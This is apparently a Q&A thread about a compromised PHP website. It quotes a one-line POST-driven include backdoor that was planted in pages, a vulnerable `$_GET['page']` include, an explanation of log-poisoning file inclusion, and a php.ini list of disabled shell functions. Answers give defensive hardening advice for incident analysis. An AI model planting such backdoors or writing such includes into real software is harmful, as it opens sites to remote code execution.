# PHP code injected - how could this happen and how to prevent it?

Tags: php, code-injection

So I found an injected code on a website. A couple of php files were prepended with an [obfuscated code](http://pastebin.com/B2nLjB2r), which evaluates to [a script](http://pastebin.com/Jhzjs2V5) that allows accessing other files in the filesystem and executing terminal commands. A few other pages were injected with this simple code:

```
<?php
if(isset($_POST{"VXzGE"})) include_once($_POST{"VXzGE"});
```

I am told there there hasn't been any breach to the server itself, so the only way I can think of for this breach to be possible would be via insecure form. Assuming the site has several forms:

1. some forms upload files
2. some save info in database
3. other only save a cookie depending on the submitted form contents

**How could I check where the injection come from?**

**I am sure there must be some common ways of doing this kind of thing, what are they?**

FYI my server has these functions disabled via php.ini:

```
disable_functions = "apache_child_terminate, escapeshellarg, escapeshellcmd, exec, fp, fput, highlight_file, passthru, php_uname, popix_mkfifo, posix_setpgid, posix_setsid, posix_setuid, posix_setuid, posix_uname, proc_close, proc_get_status, proc_nice, proc_open, prce, system"
```

Answer (score 0, accepted):

For future reference I'll disclose the hole that was used to inject the code.

Firstly, there was a single insecure file that with an obvious hole:

```
include 'pages/' . $_GET['page'] . '.php';
```

This didn't give the attacker write access to the filesystem yet, but since the website had access to the whole filesystem it was able to read Apache log files (Apache not chrooted and unsafe file permissions). Attacker found that hole and this allowed him to plant a malicious code in the url which got executed the moment he read the Apache log file.

So in the end an obvious hole and a couple other oversights allow this code injection.

Unsafe file deleted, holes patched up - lesson learned.

Answer (score 0):

The input obviously came from ... input :) Search all your files for `$_GET`, `$_POST` and `$_REQUEST` (or if you use a framework like Kohana, `$this->input->post()` or whatever that framework's relevant methods are.

You should always be sanitizing all your input, even if it's something you set as a hidden field on a form - it can be changed by the user, and you can't afford to assume it's clean.

A basic "cleaning" method is to run `htmlspecialchars()` on your input, but I'd recommend using a more robust method. My weapon of choice is generally to borrow the `Input::xss_clean()` method from Kohana 2.3 (Input library, xss_clean method) - [pick a version from here](http://dev.kohanaframework.org/projects/kohana2/files). The advantage of this is that it's been developed by people who really know their stuff, has been community-edited and works pretty damn well.

Answer (score 0):

Looks like that your files were not write-protected (read-only). The foremost thing you should do it so make the code read-only. It's simple to achieve and very effective.

Next to that you should ensure that **all** input that comes into your application is properly white-listed and anything non-allowed is blocked. For PHP its adviseable to install the [suhosin extension](http://www.hardened-php.net/suhosin/).

You find diverse [cheat-sheets on the OWASP website](https://www.owasp.org/index.php/Cheat_Sheets) to what to look at.